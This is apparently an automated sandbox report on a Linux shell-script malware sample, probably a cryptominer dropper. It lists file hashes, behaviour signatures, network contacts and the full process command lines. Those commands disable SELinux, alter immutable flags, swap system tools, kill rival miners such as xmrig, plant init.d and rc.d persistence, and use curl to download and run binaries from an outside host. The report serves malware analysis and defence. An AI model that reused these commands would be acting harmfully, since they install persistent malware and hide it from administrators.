MD5 69497d0565055f626ee2bc84f818ce0f
SHA1 b5ca73e0fef84a5aa8f0155f160952c4385045b8
SHA256 5416ce07a0caf57f145d8f4f07e036d2decd72023e649f782d30be599ddf20da
SHA512 23d14d2c9f3356242a56f2716bd79d31f6c8a936c7a581d4b472ca126113a6b589f4ceb37816178b17ca09f508f196009ffcb390d349302a54dee0644f995bec

/etc/init.d/sed3ewBKk

MD5 e4da2ae5c153148fad0b3f6e5e7ce61e
SHA1 3ef89c60b9f66bad7834dc5621772d474e3e36d9
SHA256 373a932050d1fd4912c80fff5b941e49d37bf9899d156b524c6404f1c76e3923
SHA512 dff5193df49f6e639d76f38d0a45cd68efec5e6d4ee06801d732cdb1e3ca7057820be046fba05e13d07d934f248773df246760b6288b9753abe067f268d7cc10

/etc/init.d/sedkajU1t

MD5 4bf46072f9f13b2e38d58a053def37d5
SHA1 94e4b56f7a5d40a40f256a474e244642ad778a4e
SHA256 a6ef18d6a1b3f33cb3df0dce41759bda88e3133d249e6c13848fb0a007654cbf
SHA512 0ffe565c26cf1585a0d26f47328fca2d886fc33b43537f4674d0f13d6eee3f39775fa0115e8b3606148665807540244e517d7c10130c161e7191172a76a031de

/tmp/sh-thd.y06k78

MD5 2ff9930962f5ed39a68bfabddc3551ac
SHA1 9f99fbefee4a609f403025ed510c2fa93982303b
SHA256 d00546c6e26a2f1e7c7ae24a5173fb58b3d7e060d4920b7a7ba772bc76e956f7
SHA512 6b6cd3c027e2b1b3b19519a413b96f15d4dc5579f30b61919e1ab7f2e1273141dec54d8b21cf49a8b89815d3cd9694354788a13ec651e0479eb70a53f576d1df

/etc/init.d/crontabs

MD5 f21f5717d956b60f695d350bbab05716
SHA1 1155f2cf27dc56f0e981ab78517dbf6d1b45d72f
SHA256 c19b0543ff2a66484d54268c27defcd2a8d5b9ac26e267c73dace034ac21931e
SHA512 2bdf31983a48991dc7de0c2d25cb97a032fc6fd29fe1534536b9e910504a6d1317d83c935ad92bab979065da81f4f2c6218b7d2f5df31ffcc8190952a49e9ba2

/usr/local/sbin/mcron

MD5 7cd0552f2eb740d23790d82134d0adb8
SHA1 c600bdcf3ba70156856b6712070a3c65368e2e62
SHA256 62b44a654916d6e52af20897cbcf39e4134b4c79d2498fbbc08987cc392b5788
SHA512 43309fdf0e4c2a1a7503488bd0493ebd1cb66cecf2fdf19dd76be9848a80be1478fcc0662c382ad8230ecf4963d89b8c1d58c33670db8777d136ae089517e9a7

/usr/bin/bsd-port/knerl

MD5 8a51a05df6f69f2a6fc4c4e376b65f70
SHA1 1b68e2894d97363dcd9f2d7e42724dfc58e0a260
SHA256 7f048a07a9c6166054ae0a1fe9af0c38769ff6fc5189ada4e4144c71e5d24994
SHA512 505595aeeae9018dc0d31e158899d620ef4fe1d9d8e510ee10a82aec889202e4994a3e387f628033a90aa53d633c1e7c7865a98cfdfb147ecc950b3c1376a37d

/etc/init.d/grub

MD5 81bb3911dc14f3eb53d0700a4aa50475
SHA1 89531a3a74e100f51118a6c12d7a4e8d346eeac4
SHA256 8027b789feb011489894fbac26a9d3e4ecc60972d85c5df7438c3dc390fc1962
SHA512 632e4fc0d9be24c69faa8fd0e702f25a6530698908401cc868d2c294c83703b99c1378196b1b4456bc6e1d1bf364960e18427e92509d6c5bb94b4cb4d7e78995

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-13 23:20

Reported

2024-11-13 23:23

Platform

debian9-mipsel-20240418-en

Max time kernel

20s

Max time network

22s

Command Line

[/tmp/HMtWYpJGZVUZkrQK.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /usr/local/sbin/mcron /usr/local/sbin/mcron N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /bin/sed N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A

Disables SELinux

defense_evasion
Description Indicator Process Target
N/A N/A /usr/sbin/setenforce N/A

Enumerates running processes

Modifies init.d

persistence
Description Indicator Process Target
File opened for modification /etc/init.d/sedcFdtji /bin/sed N/A
File opened for modification /etc/init.d/sedUWKnOM /bin/sed N/A
File opened for modification /etc/init.d/sedecL8Uf /bin/sed N/A
File opened for modification /etc/init.d/sedlS4UXu /bin/sed N/A
File opened for modification /etc/init.d/sed894o2H /bin/sed N/A
File opened for modification /etc/init.d/selinux /tmp/HMtWYpJGZVUZkrQK.sh N/A
File opened for modification /etc/init.d/sedDJH83P /bin/sed N/A
File opened for modification /etc/init.d/sed2doE35 /bin/sed N/A
File opened for modification /etc/init.d/crontabs /tmp/HMtWYpJGZVUZkrQK.sh N/A
File opened for modification /etc/init.d/sedUppmtj /bin/sed N/A
File opened for modification /etc/init.d/sedaOm0nf /bin/sed N/A
File opened for modification /etc/init.d/sedm74Teg /bin/sed N/A
File opened for modification /etc/init.d/sed7blsk4 /bin/sed N/A
File opened for modification /etc/init.d/sedmurBwi /bin/sed N/A
File opened for modification /etc/init.d/sedpQr9ow /bin/sed N/A
File opened for modification /etc/init.d/sedFiM310 /bin/sed N/A
File opened for modification /etc/init.d/sedlZSDfw /bin/sed N/A
File opened for modification /etc/init.d/sed0t4SpK /bin/sed N/A
File opened for modification /etc/init.d/grub /usr/bin/curl N/A
File opened for modification /etc/init.d/sedTtUAO1 /bin/sed N/A
File opened for modification /etc/init.d/sedmnWxVv /bin/sed N/A

Write file to user bin folder

persistence
Description Indicator Process Target
File opened for modification /usr/local/sbin/mcron /usr/bin/curl N/A
File opened for modification /usr/bin/bsd-port/knerl /usr/bin/curl N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/76/cmdline /usr/bin/pkill N/A
File opened for reading /proc/17/cmdline /usr/bin/pkill N/A
File opened for reading /proc/684/cmdline /usr/bin/pkill N/A
File opened for reading /proc/5/status /usr/bin/pkill N/A
File opened for reading /proc/117/cmdline /usr/bin/pkill N/A
File opened for reading /proc/filesystems /usr/bin/pkill N/A
File opened for reading /proc/691/cmdline /usr/bin/pkill N/A
File opened for reading /proc/73/status /usr/bin/pkill N/A
File opened for reading /proc/117/status /usr/bin/pkill N/A
File opened for reading /proc/798/cmdline /usr/bin/pkill N/A
File opened for reading /proc/81/cmdline /usr/bin/pkill N/A
File opened for reading /proc/377/cmdline /usr/bin/pkill N/A
File opened for reading /proc/350/status /usr/bin/pkill N/A
File opened for reading /proc/692/cmdline /usr/bin/pkill N/A
File opened for reading /proc/22/cmdline /usr/bin/pkill N/A
File opened for reading /proc/19/status /usr/bin/pkill N/A
File opened for reading /proc/691/status /usr/bin/pkill N/A
File opened for reading /proc/349/cmdline /usr/bin/pkill N/A
File opened for reading /proc/14/cmdline /usr/bin/pkill N/A
File opened for reading /proc/18/status /usr/bin/pkill N/A
File opened for reading /proc/695/status /usr/bin/pkill N/A
File opened for reading /proc/149/cmdline /usr/bin/pkill N/A
File opened for reading /proc/660/cmdline /usr/bin/pkill N/A
File opened for reading /proc/71/status /usr/bin/pkill N/A
File opened for reading /proc/74/cmdline /usr/bin/pkill N/A
File opened for reading /proc/37/cmdline /usr/bin/pkill N/A
File opened for reading /proc/17/cmdline /usr/bin/pkill N/A
File opened for reading /proc/22/cmdline /usr/bin/pkill N/A
File opened for reading /proc/145/cmdline /usr/bin/pkill N/A
File opened for reading /proc/145/status /usr/bin/pkill N/A
File opened for reading /proc/filesystems /bin/sed N/A
File opened for reading /proc/24/cmdline /usr/bin/pkill N/A
File opened for reading /proc/15/status /usr/bin/pkill N/A
File opened for reading /proc/392/cmdline /usr/bin/pkill N/A
File opened for reading /proc/10/cmdline /usr/bin/pkill N/A
File opened for reading /proc/75/status /usr/bin/pkill N/A
File opened for reading /proc/3/cmdline /usr/bin/pkill N/A
File opened for reading /proc/695/status /usr/bin/pkill N/A
File opened for reading /proc/8/cmdline /usr/bin/pkill N/A
File opened for reading /proc/669/status /usr/bin/pkill N/A
File opened for reading /proc/323/status /usr/bin/pkill N/A
File opened for reading /proc/77/cmdline /usr/bin/pkill N/A
File opened for reading /proc/237/status /usr/bin/pkill N/A
File opened for reading /proc/3/cmdline /usr/bin/pkill N/A
File opened for reading /proc/4/status /usr/bin/pkill N/A
File opened for reading /proc/6/status /usr/bin/pkill N/A
File opened for reading /proc/702/cmdline /usr/bin/pkill N/A
File opened for reading /proc/74/status /usr/bin/pkill N/A
File opened for reading /proc/5/status /usr/bin/pkill N/A
File opened for reading /proc/782/status /usr/bin/pkill N/A
File opened for reading /proc/237/cmdline /usr/bin/pkill N/A
File opened for reading /proc/685/status /usr/bin/pkill N/A
File opened for reading /proc/73/cmdline /usr/bin/pkill N/A
File opened for reading /proc/684/status /usr/bin/pkill N/A
File opened for reading /proc/21/status /usr/bin/pkill N/A
File opened for reading /proc/378/status /usr/bin/pkill N/A
File opened for reading /proc/filesystems /usr/bin/pkill N/A
File opened for reading /proc/374/status /usr/bin/pkill N/A
File opened for reading /proc/75/status /usr/bin/pkill N/A
File opened for reading /proc/694/cmdline /usr/bin/pkill N/A
File opened for reading /proc/73/status /usr/bin/pkill N/A
File opened for reading /proc/151/status /usr/bin/pkill N/A
File opened for reading /proc/24/status /usr/bin/pkill N/A
File opened for reading /proc/24/status /usr/bin/pkill N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/sh-thd.9HUJKD /tmp/HMtWYpJGZVUZkrQK.sh N/A
File opened for modification /tmp/sh-thd.fSh6CI /tmp/HMtWYpJGZVUZkrQK.sh N/A

Processes

/tmp/HMtWYpJGZVUZkrQK.sh

[/tmp/HMtWYpJGZVUZkrQK.sh]

/usr/sbin/setenforce

[setenforce 0]

/usr/bin/find

[find / -maxdepth 1 -name *.mod]

/usr/bin/chattr

[chattr -ia /bin/ps]

/usr/bin/chattr

[chattr -ia /usr/bin]

/usr/bin/chattr

[chattr -ia /etc/crontab]

/bin/cp

[cp -f /usr/bin/dpkgd/ps /usr/bin/ps]

/bin/cp

[cp -f /usr/bin/dpkgd/netstat /usr/bin/netstat]

/bin/cp

[cp -f /usr/bin/dpkgd/lsof /usr/bin/lsof]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/crontab]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/alsa-utils]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/atd]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/auditd]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/console-setup.sh]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/cron]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/dbus]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/exim4]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/hwclock.sh]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/keyboard-setup.sh]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/kmod]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/networking]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/procps]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/rsyslog]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/selinux-autorelabel]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/ssh]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/sudo]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/udev]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/x11-common]

/bin/mount

[mount]

/bin/grep

[grep -o /proc/[0-9]\+]

/usr/bin/sort

[sort -u]

/usr/bin/find

[find /etc/rc1.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc1.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc1.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc1.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc2.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc2.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc2.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc2.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc3.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc3.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc3.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc3.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc4.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc4.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc4.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc4.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc5.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc5.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc5.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc5.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/pkill

[pkill awk]

/usr/bin/pkill

[pkill gurb]

/usr/bin/pkill

[pkill pythno]

/usr/bin/pkill

[pkill pythno3]

/usr/bin/pkill

[pkill pythno3.1]

/usr/bin/pkill

[pkill knerl]

/usr/bin/pkill

[pkill system.mark]

/usr/bin/pkill

[pkill system.pub]

/usr/bin/pkill

[pkill netstat.cfg]

/usr/bin/pkill

[pkill bash.cfg]

/usr/bin/pkill

[pkill libgdi.so.0.8.2]

/usr/bin/pkill

[pkill kernel]

/usr/bin/pkill

[pkill linkid]

/usr/bin/pkill

[pkill mcron]

/usr/bin/pkill

[pkill xmrig]

/usr/bin/pkill

[pkill initd]

/bin/cat

[cat]

/bin/cat

[cat]

/bin/chmod

[chmod 755 /etc/init.d/selinux /etc/init.d/crontabs]

/usr/bin/chattr

[chattr +ia /etc/init.d/selinux /etc/init.d/crontabs]

/bin/mkdir

[mkdir -p /usr/bin/bsd-port /usr/local/sbin]

/bin/ln

[ln -fs /etc/init.d/selinux /etc/rc2.d/S99selinux]

/bin/ln

[ln -fs /etc/init.d/selinux /etc/rc3.d/S99selinux]

/bin/ln

[ln -fs /etc/init.d/selinux /etc/rc4.d/S99selinux]

/bin/ln

[ln -fs /etc/init.d/selinux /etc/rc5.d/S99selinux]

/bin/ln

[ln -fs /etc/init.d/crontabs /etc/rc2.d/S90crontabs]

/bin/ln

[ln -fs /etc/init.d/crontabs /etc/rc3.d/S90crontabs]

/bin/ln

[ln -fs /etc/init.d/crontabs /etc/rc4.d/S90crontabs]

/bin/ln

[ln -fs /etc/init.d/crontabs /etc/rc5.d/S90crontabs]

/usr/bin/curl

[curl -fsSL http://0889.org/aegis/mcron-vip-1 -o /usr/local/sbin/mcron]

/bin/chmod

[chmod +x /usr/local/sbin/mcron]

/usr/bin/chattr

[chattr +ia /usr/local/sbin/mcron]

/usr/bin/dirname

[dirname /usr/bin/bsd-port/knerl]

/bin/mkdir

[mkdir -p /usr/bin/bsd-port]

/usr/bin/curl

[curl -fsSL http://0889.org/aegis/10000 -o /usr/bin/bsd-port/knerl]

/bin/chmod

[chmod +x /usr/bin/bsd-port/knerl]

/usr/bin/chattr

[chattr +ia /usr/bin/bsd-port/knerl]

/usr/bin/curl

[curl -fsSL http://0889.org/aegis/grub -o /etc/init.d/grub]

/bin/chmod

[chmod +x /etc/init.d/grub]

/usr/bin/chattr

[chattr +ia /etc/init.d/grub]

/usr/local/sbin/mcron

[/usr/local/sbin/mcron]

Network

Country Destination Domain Proto
US 1.1.1.1:53 0889.org udp
GB 51.143.179.104:80 0889.org tcp
US 1.1.1.1:53 0889.org udp
GB 51.143.179.104:80 0889.org tcp
US 1.1.1.1:53 0889.org udp
GB 51.143.179.104:80 0889.org tcp

Files

/etc/sedwfmGpN

MD5 8f111d100ea459f68d333d63a8ef2205
SHA1 077ca9c46a964de67c0f7765745d5c6f9e2065c3
SHA256 0e5c204385b21e15b031c83f37212bf5a4ee77b51762b7b54bd6ad973ebdf354